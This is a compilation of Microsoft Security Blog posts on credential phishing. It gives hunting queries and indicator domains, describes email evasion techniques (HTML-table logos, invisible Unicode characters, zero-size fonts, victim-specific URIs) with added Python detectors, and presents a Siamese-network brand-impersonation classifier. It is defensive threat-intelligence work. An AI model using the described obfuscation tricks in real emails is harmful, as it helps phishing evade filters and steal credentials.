Microsoft 365 Defender Threat Intelligence Team

 

Advanced hunting queries

To locate possible credential phishing activity, run the following advanced hunting queries in Microsoft 365 Defender.

Open redirect URLs in t-dot format

Find URLs in emails with a leading “t”, indicating possible open redirect URLs. Note: the use of a redirector URL does not necessitate malicious behavior. You must verify whether the emails surfaced via this AHQ are legitimate or malicious.

EmailUrlInfo
| where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?"

Open redirect URLs pointing to attacker infrastructure

Find URLs in emails possibly crafted to redirect to attacker-controlled URLs.

EmailUrlInfo
//This regex narrows in on emails that contain the known malicious domain pattern in the URL from the most recent campaigns
| where Url matches regex @"^[a-zA-Z]\-[a-zA-Z]{2}\.(xyz|club|shop|online)"

Indicators of compromise

Following is a list of domains that match the DGA pattern used in sender addresses in this and other malicious campaigns. Note that these have not all been observed in mail flow related to this campaign.

masihtidur-shoes08[.]com masihtidur-shoes07[.]com masihtidur-shoes04[.]com
masihtidur-shoes02[.]com masihtidur-shoes01[.]com wixclwardwual-updates9[.]com
wixclwardwual-updates8[.]com wixclwardwual-updates7[.]com wixclwardwual-updates6[.]com
wixclwardwual-updates5[.]com wixclwardwual-updates10[.]com wixclwardwual-updates1[.]com
zxcsaxb-good8[.]com zxcsaxb-good6[.]com zxcsaxb-good5[.]com
zxcsaxb-good4[.]com zxcsaxb-good3[.]com zxcsaxb-good10[.]com
trashxn-euyr9[.]com trashxn-euyr7[.]com trashxn-euyr6[.]com
trashxn-euyr5[.]com trashxn-euyr3[.]com trashxn-euyr20[.]com
trashxn-euyr2[.]com trashxn-euyr19[.]com trashxn-euyr18[.]com
trashxn-euyr17[.]com trashxn-euyr16[.]com trashxn-euyr15[.]com
trashxn-euyr14[.]com trashxn-euyr12[.]com trashxn-euyr11[.]com
trashxn-euyr10[.]com trashxn-euyr1[.]com berangberang-9[.]com
berangberang-7[.]com berangberang-12[.]com berangberang-6[.]com
notoficationdeliveryamazon8[.]com berangberang-8[.]com berangberang-3[.]com
berangberang-4[.]com berangberang-10[.]com berangberang-11[.]com
berangberang-13[.]com berangberang-5[.]com 77support-update23-4[.]com
posher876ffffff-30[.]com posher876ffffff-5[.]com posher876ffffff-25[.]com
fenranutc0x24ai-11[.]com organix-xtc21[.]com fenranutc0x24ai-13[.]com
fenranutc0x24ai-4[.]com fenranutc0x24ai-17[.]com fenranutc0x24ai-18[.]com
adminsecurity102[.]com adminsecurity101[.]com 23moesian-17[.]com
23moesian-10[.]com 23moesian-11[.]com 23moesian-26[.]com

The post Widespread credential phishing campaign abuses open redirector links appeared first on Microsoft Security Blog.

Trend-spotting email techniques: How modern phishing emails hide in plain sight

August 18th, 2021

With the massive volume of emails sent each day, coupled with the many methods that attackers use to blend in, identifying the unusual and malicious is more challenging than ever. An obscure Unicode character in a few emails is innocuous enough, but when a pattern of emails containing this obscure character accompanied by other HTML quirks, strange links, and phishing pages or malware is observed, it becomes an emerging attacker trend to investigate. We closely monitor these kinds of trends to gain insight into how best to protect customers.

This blog shines a light on techniques that are prominently used in many recent email-based attacks. We’ve chosen to highlight these techniques based on their observed impact to organizations, their relevance to active email campaigns, and because they are intentionally designed to be difficult to detect. They hide text from users, masquerade as the logos of trusted companies, and evade detection by using common web practices that are usually benign:

  • Brand impersonation with procedurally-generated graphics
  • Text padding with invisible characters
  • Zero-point font obfuscation
  • Victim-specific URI

We’ve observed attackers employ these tricks to gain initial access to networks. Although the examples we present were primarily seen in credential theft attacks, any of these techniques can be easily adapted to deliver malware.

By spotting trends in the threat landscape, we can swiftly respond to potentially malicious behavior. We use the knowledge we gain from our investigations to improve customer security and build comprehensive protections. Through security solutions such as Microsoft Defender for Office 365 and the broader Microsoft 365 Defender, we deliver durable and comprehensive protection against the latest attacker trends.

Brand impersonation with procedurally-generated graphics

We have observed attackers using HTML tables to imitate the logos and branding of trusted organizations. In one recent case, an attacker created a graphic resembling the Microsoft logo by using a 2×2 HTML table and CSS styling to closely match the official branding.

Spoofed logos created with HTML tables allow attackers to bypass brand impersonation protections. Malicious content arrives in users’ inboxes, appearing to recipients as if it were a legitimate message from the company. While Microsoft Defender for Office 365 data shows a decline in the usage of this technique over the last few months, we continue to monitor for new ways that attackers will use procedurally-generated graphics in attacks.

Figure 1. Tracking data for small 2×2 HTML tables

How it works

A graphic resembling a trusted organization’s official logo is procedurally generated from HTML and CSS markup. It’s a fileless way of impersonating a logo, because there are no image files for security solutions to detect. Instead, the graphic is constructed out of a specially styled HTML table that is embedded directly in the email.

Of course, inserting an HTML table into an email is not malicious on its own. The malicious pattern emerges when we view this technique in context with the attacker’s goals.

Two campaigns that we have been tracking since April 2021 sent targets emails that recreated the Microsoft logo. They impersonated messages from Office 365 and SharePoint. We observed the following email subjects:

  • Action Required: Expiration Notice On <Email Address>
  • Action Required: 3 Pending Messages sent <date>
  • New 1 page incoming eFax© message for “<Email Alias>”

Figure 2. Sample emails that use HTML code to embed a table designed to mimic the Microsoft logo

Upon extracting the HTML used in these emails, Microsoft analysts determined that the operators used the HTML table tag to create a 2×2 table resembling the Microsoft logo. The background color of each of the four cells corresponded to the colors of the quadrants of the official logo.

Figure 3. Page source of the isolated HTML mimicking the Microsoft logo

HTML and CSS allow colors to be referenced in several different ways. Many colors can be referenced in code via English language color names, such as “red” or “green”. Colors can also be represented using six-digit hexadecimal values (for example, #ffffff for white and #000000 for black), or by sets of three numbers, with each number signifying the amount of red, green, or blue (RGB) to combine. These methods allow for greater precision and variance, as the designer can tweak the numbers or values to customize the color’s appearance.

Figure 4. Color values used to replicate the Microsoft logo

As seen in the above screenshot, attackers often obscure the color references to the Microsoft brand by using color names, hexadecimal, and RGB to color in the table. By switching up the method they use to reference the color, or slightly changing the color values, the attacker can further evade detection by increasing variance between emails.
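As an added example (not code from the Microsoft post), the following Python detector normalises the three colour notations just described and flags any four-cell table whose cells, however each colour was written, together reproduce a reference palette. The Microsoft logo quadrant values are the publicly documented brand colours and are assumed here; the sample HTML is constructed.

```python
import re
from html.parser import HTMLParser

# Reference palette: the four quadrant colours of the Microsoft logo. These are
# the publicly documented brand values, assumed here; the post does not list them.
MS_LOGO_PALETTE = {
    "red": (0xF2, 0x50, 0x22),
    "green": (0x7F, 0xBA, 0x00),
    "blue": (0x00, 0xA4, 0xEF),
    "yellow": (0xFF, 0xB9, 0x00),
}

# A few CSS named colours; extend with the full CSS list in real use.
CSS_NAMED = {
    "red": (255, 0, 0), "green": (0, 128, 0), "blue": (0, 0, 255),
    "yellow": (255, 255, 0), "white": (255, 255, 255), "black": (0, 0, 0),
    "orangered": (255, 69, 0), "yellowgreen": (154, 205, 50),
    "deepskyblue": (0, 191, 255), "gold": (255, 215, 0),
}


def parse_css_color(value):
    """Normalise a CSS colour (name, #rgb, #rrggbb or rgb()/rgba()) to (r, g, b)."""
    v = value.strip().lower()
    if v in CSS_NAMED:
        return CSS_NAMED[v]
    m = re.fullmatch(r"#([0-9a-f]{3}|[0-9a-f]{6})", v)
    if m:
        h = m.group(1)
        if len(h) == 3:                      # expand #abc to #aabbcc
            h = "".join(c * 2 for c in h)
        return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))
    m = re.fullmatch(r"rgba?\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)(?:\s*,\s*[\d.]+)?\s*\)", v)
    if m:
        return tuple(min(255, int(x)) for x in m.groups())
    return None


def color_distance(a, b):
    """Euclidean distance in RGB space; small values mean near-identical colours."""
    return sum((x - y) ** 2 for x, y in zip(a, b)) ** 0.5


class _CellColorCollector(HTMLParser):
    """Collect the background colour of every <td>, grouped per <table>."""

    def __init__(self):
        super().__init__()
        self.tables = []
        self._stack = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "table":
            self._stack.append([])
        elif tag == "td" and self._stack:
            color = a.get("bgcolor")
            m = re.search(r"background(?:-color)?\s*:\s*([^;]+)", a.get("style") or "", re.I)
            if m:
                color = m.group(1)
            self._stack[-1].append(parse_css_color(color) if color else None)

    def handle_endtag(self, tag):
        if tag == "table" and self._stack:
            self.tables.append(self._stack.pop())


def find_logo_tables(html, palette=MS_LOGO_PALETTE, tolerance=60.0):
    """Return the cell colours of every four-cell table that covers the whole palette.

    Each cell must lie within `tolerance` of some palette colour, and together the
    cells must hit every palette colour, whatever notation the markup used.
    """
    collector = _CellColorCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for cells in collector.tables:
        if len(cells) != 4 or any(c is None for c in cells):
            continue
        matched = set()
        for cell in cells:
            name, dist = min(((n, color_distance(cell, ref)) for n, ref in palette.items()),
                             key=lambda t: t[1])
            if dist <= tolerance:
                matched.add(name)
        if matched == set(palette):
            hits.append(cells)
    return hits


# Constructed sample: one logo-like table mixing hex, rgb() and named colours,
# plus a harmless two-cell layout table.
SAMPLE_EMAIL_HTML = """
<table><tr><td bgcolor="#f25022">&nbsp;</td><td style="background: rgb(127,186,0)">&nbsp;</td></tr>
<tr><td style="background-color: deepskyblue">&nbsp;</td><td bgcolor="gold">&nbsp;</td></tr></table>
<table><tr><td bgcolor="white">Header</td><td bgcolor="white">Body</td></tr></table>
"""

if __name__ == "__main__":
    for cells in find_logo_tables(SAMPLE_EMAIL_HTML):
        print("logo-like 2x2 table:", cells)
```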

Text padding with invisible characters

In several observed campaigns, attackers inserted invisible Unicode characters to break up keywords in an email body or subject line in an attempt to bypass detection and automated security analysis. Certain characters in Unicode indicate extremely narrow areas of whitespace, or are not glyphs at all and are not intended to render on screen.

Some invisible Unicode characters that we have observed being used maliciously include:

  • Soft hyphen (U+00AD)
  • Word joiner (U+2060)

Both of these are control characters that affect how other characters are formatted. They are not glyphs and would not even be visible to readers, in most cases. As seen in the following graph, the use of the soft hyphen and word joiner characters has seen a steady increase over time. These invisible characters are not inherently malicious, but seeing an otherwise unexplained rise of their use in emails indicates a potential shift in attacker techniques.

Figure 5. Tracking data for the invisible character obfuscation technique

How it works

When a recipient views a malicious email containing invisible Unicode characters, the text content may appear indistinguishable from any other email. Although not visible to readers, the extra characters are still included in the body of the email and are “visible” to filters or other security mechanisms. If attackers insert extra, invisible characters into a word they don’t want security products to “see,” the word might be treated as qualitatively different from the same word without the extra characters. This allows the keyword to evade detection even if filters are set to catch the visible part of the text.

Invisible characters do have legitimate uses. They are, for the most part, intended for formatting purposes: for instance, to indicate where to split a word when the whole word can’t fit on a single line. However, an unintended consequence of these characters not displaying like ordinary text is that malicious email campaign operators can insert the characters to evade security.

The animated GIF below shows how the soft hyphen characters are typically used in a malicious email. The soft hyphen is placed between each letter in the red heading to break up several key words. It’s worth noting that the soft hyphens are completely invisible to the reader until the text window is narrowed and the heading is forced to break across multiple lines.

Figure 6. Animation showing the use of the invisible soft hyphen characters

In the following example, a phishing email has had invisible characters inserted into the email body: specifically, in the “Keep current Password” text that links the victim to a phishing page.

Figure 7. Microsoft Office 365 phishing email using invisible characters to obfuscate the URL text.

The email appears by all means “normal” to the recipient, however, attackers have slyly added invisible characters in between the text “Keep current Password.” Clicking the URL directs the user to a phishing page impersonating the Microsoft single sign-on (SSO) page.

In some campaigns, we have seen the invisible characters applied to every word, especially any word referencing Microsoft or Microsoft products and services.

Zero-point font obfuscation

This technique involves inserting hidden words with a font size of zero into the body of an email. It is intended to throw off machine learning detections, by adding irrelevant sections of text to the HTML source making up the email body. Attackers can successfully obfuscate keywords and evade detection because recipients can’t see the inserted text—but security solutions can.

Microsoft Defender for Office 365 has been blocking malicious emails with zero-point font obfuscation for many years now. However, we continue to observe its usage regularly.

Figure 8. Tracking data for emails containing zero-point fonts experienced surges in June and July 2021

How it works

Similar to how there are many ways to represent colors in HTML and CSS, there are also many ways to indicate font size. We have observed attackers using the following styling to insert hidden text via this technique:

  • font-size: 0px
  • font-size: 0.0000em
  • font-size: 0vw
  • font-size: 0%
  • font: italic bold 0.0px Georgia, serif
  • font: italic bold 0em Georgia, serif
  • font: italic bold 0vw Georgia, serif
  • font: italic bold 0% Georgia, serif

Being able to add zero-size text to a page is a quirk of HTML and CSS. It is sometimes used legitimately for adding metadata to an email or to adjust whitespace on a page. Attackers repurpose this quirk to break up words and phrases a defender might want to track, whether to raise an alert or block the content entirely. As with the invisible Unicode character technique, certain kinds of security solutions might treat text containing these extra characters as distinct from the same text without them. This allows the visible keyword text to slip past security.

In a July 2021 phishing campaign blocked by Microsoft Defender for Office 365, the attacker used a voicemail lure to entice recipients into opening an email attachment. Hidden, zero-width letters were added to break up keywords that might otherwise have been caught by a content filter. The following screenshot shows how the email appeared to targeted users.

Figure 9. Sample email that uses the zero-point font technique

Those with sharp eyes might be able to spot the awkward spaces where the attacker inserted letters that are fully visible only within the HTML source code. In this campaign, the obfuscation technique was also used in the malicious email attachment, to evade file-hash based detections.
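The following Python example is added here and is not part of the Microsoft post; it covers both the invisible-character technique and the zero-point font technique described above. It drops text inside zero-size elements (using the CSS forms listed above), strips Unicode format characters, and then matches keywords, so the difference between naive and normalised matching is visible. The sample email is constructed.

```python
import re
import unicodedata
from html.parser import HTMLParser

# Format characters the post reports being inserted into keywords; Unicode
# category "Cf" (format) covers these and their zero-width relatives.
INVISIBLE_CHARS = {"\u00ad": "SOFT HYPHEN", "\u2060": "WORD JOINER",
                   "\u200b": "ZERO WIDTH SPACE", "\ufeff": "ZERO WIDTH NO-BREAK SPACE"}

# Zero-size font declared through font-size or the font shorthand, in the unit
# forms listed above (0px, 0.0000em, 0vw, 0%) plus a bare 0.
ZERO_FONT_RE = re.compile(
    r"font(?:-size)?\s*:\s*(?:[a-z-]+\s+)*0+(?:\.0+)?(?:px|pt|em|rem|vw|vh|%)?(?![\w.%])",
    re.I,
)

VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}
BLOCK_TAGS = {"p", "div", "tr", "li", "h1", "h2", "h3", "td", "table"}


class _VisibleTextExtractor(HTMLParser):
    """Split email text into what the recipient sees and what zero-size fonts hide."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True also decodes &shy; etc.
        self.visible = []
        self.hidden = []
        self._open = []             # per open element: True if it started a hidden region
        self._hidden_depth = 0

    def _sink(self):
        return self.hidden if self._hidden_depth else self.visible

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        hides = bool(ZERO_FONT_RE.search(dict(attrs).get("style") or ""))
        self._open.append(hides)
        if hides:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self._open and self._open.pop():
            self._hidden_depth -= 1
        if tag in BLOCK_TAGS:
            self._sink().append(" ")   # block boundaries separate words

    def handle_data(self, data):
        self._sink().append(data)


def strip_invisible(text):
    """Remove soft hyphens, word joiners and every other Unicode format character."""
    return "".join(ch for ch in text if ch not in INVISIBLE_CHARS
                   and unicodedata.category(ch) != "Cf")


def _extract(html):
    p = _VisibleTextExtractor()
    p.feed(html)
    p.close()
    return p


def visible_text(html):
    """Text as the recipient sees it: hidden elements dropped, invisible characters removed."""
    return re.sub(r"\s+", " ", strip_invisible("".join(_extract(html).visible))).strip()


def hidden_fragments(html):
    """Text that only exists inside zero-size-font elements (a signal in itself)."""
    return [frag for frag in _extract(html).hidden if frag.strip()]


def find_keywords(html, keywords):
    """Return (naive_hits, normalized_hits) so the effect of normalisation is visible."""
    raw = html.lower()
    naive = [k for k in keywords if k.lower() in raw]
    norm = visible_text(html).lower()
    normalized = [k for k in keywords if k.lower() in norm]
    return naive, normalized


# Constructed sample combining both tricks: a zero-size filler paragraph, zero-size
# letters splitting "password", and soft hyphens / word joiners inside the link text.
SAMPLE_EMAIL = (
    '<html><body>'
    '<p style="font-size: 0px">lorem ipsum filler text</p>'
    '<p>Your <span style="font: italic bold 0.0px Georgia, serif">x</span>pass'
    '<span style="font-size:0%">q</span>word will expire today.</p>'
    '<a href="https://example.invalid/keep">K\u00ade\u00ade\u00adp \u2060current\u2060 '
    'P\u00ada\u00adss\u00adword</a>'
    '</body></html>'
)
KEYWORDS = ["password", "Keep current Password", "expire"]

if __name__ == "__main__":
    print("hidden:", hidden_fragments(SAMPLE_EMAIL))
    print("visible:", visible_text(SAMPLE_EMAIL))
    print("naive vs normalized:", find_keywords(SAMPLE_EMAIL, KEYWORDS))
```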

Figure 10. The HTML code of the email body, exposing the use of the zero-point font technique

Victim-specific URI

Victim-specific URI is a way of transmitting information about the target and creating dynamic content based upon it. In this technique, a custom URI crafted by the attacker passes information about the target to an attacker-controlled website. This aids in spear-phishing by personalizing content seen by the intended victim. This is often used by the attacker to create legitimate-seeming pages that impersonate the Single Sign On (SSO) experience.

The following graph shows cyclic surges in email content, specifically links that have an email address included as part of the URI. Since custom URIs are such a common web design practice, their usage always returns to a steady baseline in between peaks. The surges appear to be related to malicious activity, since attackers will often send out large numbers of spam emails over the course of a campaign.

Figure 11. Tracking data for emails containing URLs with email address in the PHP parameter

In a campaign Microsoft analysts observed in early May 2021, operators generated tens of thousands of subdomains from Google’s Appspot, creating unique phishing sites and victim identifiable URIs for each recipient. The technique allowed the operators to host seemingly legitimate Microsoft-themed phishing sites on third-party infrastructure.

How it works

The attacker sends the target an email, and within the body of the email is a link that includes special parameters as part of the web address, or URI. The custom URI parameters contain information about the target. These parameters often utilize PHP, as PHP is a programming language frequently used to build websites with dynamic content—especially on large platforms such as Appspot.

Details such as the target’s email address, alias, or domain are sent via the URI to an attacker-controlled web page when the user visits the link. The attacker’s web page pulls the details from the parameters and uses them to present the target with personalized content. This can help the attacker make malicious websites more convincing, especially if they are trying to mimic a user logon page, as the target will be greeted by their own account name.

Custom URIs containing user-specific parameters are not always, or even often, malicious. They are commonly used by all kinds of web developers to transmit pertinent information about a request. A query to a typical search engine will contain numerous parameters concerning the nature of the search as well as information about the user, so that the search engine can provide users with tailored results.

However, in the victim identifiable URI technique, attackers repurpose a common web design practice to malicious ends. The tailored results seen by the target are intended to trick them into handing over sensitive information to an attacker.

In the Compact phishing campaign described by WMC Global and tracked by Microsoft, this technique allowed the operators to host Microsoft-themed phishing sites on any cloud infrastructure, including third-party platforms such as Google’s Appspot. Microsoft’s own research into the campaign in May noted that not only tens of thousands of individual sites were created, but that URIs were crafted for each recipient, and the recipient’s email address was included as a parameter in the URI.

Newer variants of the May campaign started to include links in the email, which routed users through a compromised website, to ultimately redirect them to the Appspot-hosted phishing page. Each hyperlink in the email template used in this version of the campaign was structured to be unique to the recipient.

The recipient-specific information passed along in the URI was used to render their email account name on a custom phishing page, attempting to mimic the Microsoft Single Sign On (SSO) experience. Once on the phishing page, the user was prompted to enter their Microsoft account credentials. Entering that information would send it to the attacker.
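An added Python example (not the post's own tooling) that flags links carrying an email address in the path, query or fragment, trying the URL-decoded and base64-decoded forms of each query value, and reports whether the address matches the recipient the message was delivered to. The hostnames and the sample email are constructed.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class _LinkCollector(HTMLParser):
    """Gather every href in the email body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def _decodings(value):
    """Yield plausible readings of a parameter value: as-is, URL-decoded, base64-decoded."""
    yield value
    yield unquote(value)
    padded = value + "=" * (-len(value) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            yield decoder(padded).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            pass                       # not base64; nothing to read here


def victim_specific_links(html, recipient):
    """Flag links that carry an email address in their path, query or fragment.

    Returns one (url, location, email, addressed_to_recipient) tuple per flagged link.
    """
    collector = _LinkCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for url in collector.links:
        parts = urlsplit(url)
        candidates = [("path", unquote(parts.path)), ("fragment", unquote(parts.fragment))]
        for key, val in parse_qsl(parts.query, keep_blank_values=True):
            candidates.extend(("query:" + key, d) for d in _decodings(val))
        for location, text in candidates:
            m = EMAIL_RE.search(text)
            if m:
                email = m.group(0)
                hits.append((url, location, email, email.lower() == recipient.lower()))
                break
    return hits


# Constructed sample: one ordinary link, then three ways the recipient's address
# can be carried in a URI (URL-encoded query value, base64 query value, fragment).
RECIPIENT = "alice@example.invalid"
SAMPLE_EMAIL_HTML = (
    '<p>Please review the document.</p>'
    '<a href="https://help.example.invalid/article?topic=billing">Help</a>'
    '<a href="https://login.example.invalid/index.php?user=alice%40example.invalid">Sign in</a>'
    '<a href="https://go.example.invalid/r?d=YWxpY2VAZXhhbXBsZS5pbnZhbGlk">Review</a>'
    '<a href="https://sso.example.invalid/#alice@example.invalid">SSO</a>'
)

if __name__ == "__main__":
    for hit in victim_specific_links(SAMPLE_EMAIL_HTML, RECIPIENT):
        print(hit)
```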

Microsoft Defender for Office 365 delivers protection powered by threat intelligence

As the phishing techniques we discussed in this blog show, attackers use common or standard aspects of emails to hide in plain sight and make attacks very difficult to detect or block. With our trend tracking in place, we can make sense of suspicious patterns, and notice repeated combinations of techniques that are highly likely to indicate an attack. This enables us to ensure we protect customers from the latest evasive email campaigns through Microsoft Defender for Office 365. We train machine learning models to keep an eye on activity from potentially malicious domains or IP addresses. Knowing what to look out for, we can rule out false positives and focus on the bad actors.

This has already paid off. Microsoft Defender for Office 365 detected and protected customers from sophisticated phishing campaigns, including the Compact campaign. We also employed our knowledge of prevalent trends to hunt for a ransomware campaign that might have otherwise escaped notice. We swiftly opened an investigation to protect customers from what seemed at first like a set of innocuous emails.

Trend tracking helps us to expand our understanding about prevalent attacker tactics and to improve existing protections. We’ve already set up rules to detect the techniques described in this blog. Our understanding of the threat landscape has led to better response times to critical threats. Meanwhile, deep within Microsoft Defender for Office 365, rules for raising alerts are weighted so that detecting a preponderance of suspicious techniques triggers a response, while legitimate emails are allowed to travel to their intended inboxes.

Threat intelligence also drives what new features are developed, and which rules are added. In this way, generalized trend tracking leads to concrete results. Microsoft is committed to using our knowledge of the threat landscape to continue to track trends, build better protections for our products, and share intelligence with the greater online community.

Learn how to protect all of Office 365 against advanced threats like business email compromise and credential phishing with Microsoft Defender for Office 365.

 

Microsoft 365 Defender Threat Intelligence Team

 

The post Trend-spotting email techniques: How modern phishing emails hide in plain sight appeared first on Microsoft Security Blog.

Spotting brand impersonation with Swin transformers and Siamese neural networks

August 4th, 2021

Every day, Microsoft Defender for Office 365 encounters around one billion brand impersonation emails. Our security solutions use multiple detection and prevention techniques to help users avoid divulging sensitive information to phishers as attackers continue refining their impersonation tricks. In this blog, we discuss our latest innovation toward developing another detection layer focusing on the visual components of brand impersonation attacks. We presented this approach in our Black Hat briefing Siamese neural networks for detecting brand impersonation today.

Before a brand impersonation detection system can be trained to distinguish between legitimate and malicious email that use the same visual elements, we must first teach it to identify what brand the content is portraying in the first place. Using a combination of machine learning techniques that convert images to real numbers and can perform accurate judgments even with smaller datasets, we have developed a detection system that outperforms all visual fingerprint-based benchmarks on all metrics while maintaining a 90% hit rate. Our system is not simply “memorizing” logos but is making decisions based on other salient aspects such as color schemes or fonts. This, among other state-of-the-art AI that feeds into Microsoft 365 Defender, improves our protection capabilities against the long-standing problem of phishing attacks.

Two-step approach to spot impersonations

In brand impersonation attacks, an email or a website is designed to appear visually identical to a known legitimate brand, like Microsoft 365 or LinkedIn, but the domain—to which user-inputted information, like passwords or credit card details, is sent—is actually controlled by an attacker. An example of a malicious sign-in page impersonating Microsoft is shown in Figure 1.

Figure 1. Example of a Microsoft brand impersonation attempt

Any vision-based system, computer or human, that detects brand impersonation attacks must take a two-step approach upon receiving content:

  1. Determine whether the content looks like content from a known brand, and if so, which brand
  2. Determine if other artifacts associated with the content (such as URLs, domain names, or certificates) match those used by the identified brand

For example, if a brand impersonation detection system sees an image that appears to come from Microsoft but also notices that the URL is indeed from Microsoft and that the certificate matches a known certificate issued to Microsoft, then the content would be classified as legitimate.

However, if the detector encounters content which shares visual characteristics with legitimate Microsoft content like in Figure 1, but then notices that the URL associated with the content is an unknown or unclassified URL with a suspicious certificate, then the content would be flagged as a brand impersonation attack.

Training our system to identify brands

The key to an effective brand impersonation detection system is identifying known brands as reliably as possible. This is true for both a manual system and an automated one. For sighted humans, the process of identifying brands is straightforward. On the other hand, teaching an automated system to identify brands is more challenging. This is especially true because each brand might have several visually distinct sign-in pages.

For example, Figure 2 shows two Microsoft Excel brand impersonation attempts. While both cases share some visual characteristics, the differences in background, color, and text make the creation of rule-based systems to detect brands based on rudimentary similarity metrics (such as robust image hashing) more difficult. Therefore, our goal was to improve brand labeling, which will ultimately improve brand impersonation detection.

Figure 2. Further examples of brand impersonation attempts targeting Microsoft Excel

Of course, deep learning is the assumed default tool for image recognition, so it was only natural to perform brand detection by combining labeled brand images with modern deep-learning techniques. To do this, we first sought out, captured, and manually labeled over 50,000 brand impersonation screenshots using our own detonation system.

While our dataset consisted of over 1,300 distinct brands, most brands were not well-represented: 896 brands appeared fewer than 5 times, and 541 brands appeared in the dataset only once. The lack of significant representation for each brand meant that using standard approaches like a convolutional neural network would not be feasible.

Converting images to real numbers via embeddings

To address the limitations of our data, we adopted a cutting-edge, few-shot learning technique known as Siamese neural networks (sometimes called neural twin networks). However, before explaining what a Siamese neural network is, it is important to understand how embedding-based classifiers work.

Building an embedding-based classifier proceeds in two steps. The first step is to embed the image into a lower dimensional space. All this means is that the classifier transforms the pixels that make up the images into a vector of real numbers. So, for example, the network might take as an input the pixel values in Figure 1 and output the value (1.56, 0.844). Because the network translates the images into two real numbers, we say the network embeds the images into a two-dimensional space.

While in practice we use more than a two-dimensional embedding, Figure 3 shows all our images embedded in two-dimensional space. The red dots represent the embeddings of images all appearing to be from one brand. This effectively translates the visual data into something our neural network can digest.

Figure 3: A two-dimensional representation of embeddings, where the red dots represent one brand

Given the embeddings, the second step of the algorithm is to classify the embedded images. For example, given a set of embedded screenshots and a new screenshot we call X, we can perform brand classification by embedding X and then assigning to X the brand whose image is “closest” to X in the embedded space.

Training the system to minimize contrastive loss

In understanding the two-dimensional embeddings above, readers might assume that there was an “embedder” that placed screenshots of the same brand close together, or at least that there was some inherent meaning in the way the images were embedded. Of course, neither was true. Instead, we needed to train our detector to do this.

This is where Siamese neural networks with an associated contrastive loss come into play. A Siamese network takes as an input two raw images and embeds them both. The contrastive loss the network computes is the distance between the images if the images come from the same brand and the negative of the distance between the images if they come from a different brand. This means that when a Siamese network is trained to minimize losses, it embeds screenshots of the same brand close together and screenshots of different brands far apart. An example of how the network minimizes losses is shown in Figure 4.

Figure 4. Successful Siamese network embeddings. The network minimizes loss by embedding screenshots that pertain to Microsoft close together while simultaneously embedding screenshots from Microsoft and LinkedIn far apart. Note that the algorithm is trained on entire screenshots and not just logos. The logos are used here for illustrative purposes only.

We also mentioned that the Siamese network can perform any type of classification on the embedded images. Therefore, we used standard feedforward neural networks to train the system to perform the classification. The full architecture is illustrated in Figure 5 below. The images were first embedded into a low-dimensional space using Swin transformers, a cutting-edge computer-vision architecture. The embeddings were then used to calculate the contrastive loss. Simultaneously, the embeddings were fed into a feedforward neural network, which then output the predicted class. When training the system, the total loss is the sum of the contrastive loss and a standard log-likelihood loss based on the output of both classification networks.

Figure 5. Siamese neural network architecture

Basing success metrics on costs and benefits of correct labelling

Since this is a multi-class classification system, we needed to be careful about how we defined our metrics for success. Specifically, the notions of a true positive or a false negative are not well-defined in multi-class classification problems. Therefore, we developed metrics based on the associated costs and benefits of real-world outcomes. For example, the cost of mislabeling a known brand as another known brand is not the same as observing a never-before-seen brand but labeling it as a known brand. Furthermore, we separated our metrics for known and unknown brands. As a result, we developed the following five metrics:

  1. Hit rate – the proportion of known brands that are correctly labeled
  2. Known misclassification rate – the proportion of known brands that are incorrectly labeled as another known brand
  3. Incorrect unknown rate – the proportion of known brands that are incorrectly labeled as an unknown brand
  4. Unknown misclassification rate – the proportion of screenshots of unknown brands that are labeled as a known brand
  5. Correct unknown rate – the proportion of unknown brands that are correctly labeled as unknown

These metrics are also summarized in Figure 6 below. Since all our images were labeled, we simulated an unknown brand by removing all brands with only one screenshot from the training set and only used them for evaluating our metrics on a held-out test set.

Figure 6. Classification metrics. Metrics with upward-facing triangles indicate that the results are better when they are higher. Metrics with downward-facing triangles are better when they are lower.

Outperforming visual fingerprint-based benchmarks

The main results of our brand impersonation classification system are given in Figure 7 and are straightforward to summarize: our system outperforms all visual fingerprint-based benchmarks on all metrics while maintaining a 90% hit rate. The results also show that if minimizing the known misclassification rate were more beneficial than maximizing hit rate, the known misclassification rate can be brought below 2% while the hit rate remains above 60%, with the Siamese network still beating the visual fingerprint-based approaches on all metrics.

Figure 7. Results of how our system fared against other image recognition systems

We can further examine some examples to show that the network did not simply memorize the screenshots and can correctly label variations on the same brand. Figure 8 shows two different malicious DHL brand impersonation sign-in pages. Despite a different visual layout and color scheme (use of a black bar in the left image, white on the right), the network still correctly classified both. Furthermore, the network was able to correctly classify the image on the left even though it carried several logos of other companies on the bottom bar. This means that the network is doing more than logo recognition and is also making decisions based on other features, such as color schemes or the dominant font style.

Figure 8. Variations on the DHL sign-in page, both classified correctly by our system as pertaining to DHL

Important applications in detecting phishing campaigns

Phishers have become particularly good at creating phishing websites or crafting emails that closely resemble known legitimate brands visually. This allows them to gain users’ trust and trick them into disclosing sensitive information.

Our work prevents attackers from hijacking legitimate brands by detecting entities that visually look like legitimate brands but do not match other known characteristics or features of that brand. Moreover, this work helps us with threat intelligence generation by clustering known attacks or phishing kits based on the specific brands they target visually and identifying new attack techniques that might impersonate the same brand but employ other attack techniques.

